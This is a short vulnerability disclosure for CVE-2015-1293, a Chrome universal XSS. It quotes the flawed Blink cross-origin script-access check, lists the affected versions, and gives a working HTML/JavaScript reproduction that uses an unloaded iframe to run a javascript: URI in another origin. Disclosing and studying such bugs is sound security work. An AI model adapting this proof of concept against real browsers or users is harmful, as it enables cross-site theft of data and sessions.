Chrome Universal XSS by loading a javascript: URI from an unloaded window (CVE-2015-1293)

#### VULNERABILITY DETAILS From /WebKit/Source/core/frame/DOMWindow.cpp: ``` bool DOMWindow::isInsecureScriptAccess(LocalDOMWindow& callingWindow, const String& urlString) { if (!protocolIsJavaScript(urlString)) return false; // If this DOMWindow isn't currently active in the Frame, then there's no // way we should allow the access. if (isCurrentlyDisplayedInFrame()) { // FIXME: Is there some way to eliminate the need for a separate "callingWindow == this" check? if (&callingWindow == this) return false; // FIXME: The name canAccess seems to be a roundabout way to ask "can execute script". // Can we name the SecurityOrigin function better to make this more clear? if (callingWindow.frame()->securityContext()->securityOrigin()->canAccessCheckSuborigins(frame()->securityContext()->securityOrigin())) return false; } callingWindow.printErrorMessage(crossDomainAccessErrorMessage(&callingWindow)); return true; } ``` |callingWindow| may be an unloaded window whose associated |frame()| holds another, potentially cross-origin document. As a result, the security check can be bypassed. #### VERSION Chrome 44.0.2403.157 (Stable) Chrome 45.0.2454.46 (Beta) Chrome 46.0.2486.0 (Dev) Chromium 47.0.2493.0 (Release build compiled today) #### REPRODUCTION CASE ``` <script> var i = document.documentElement.appendChild(document.createElement('iframe')); var f = frames[0].Function; i.onload = function() { f("location.replace('javascript:alert(location)')")(); } i.src = 'https://abc.xyz'; </script> ```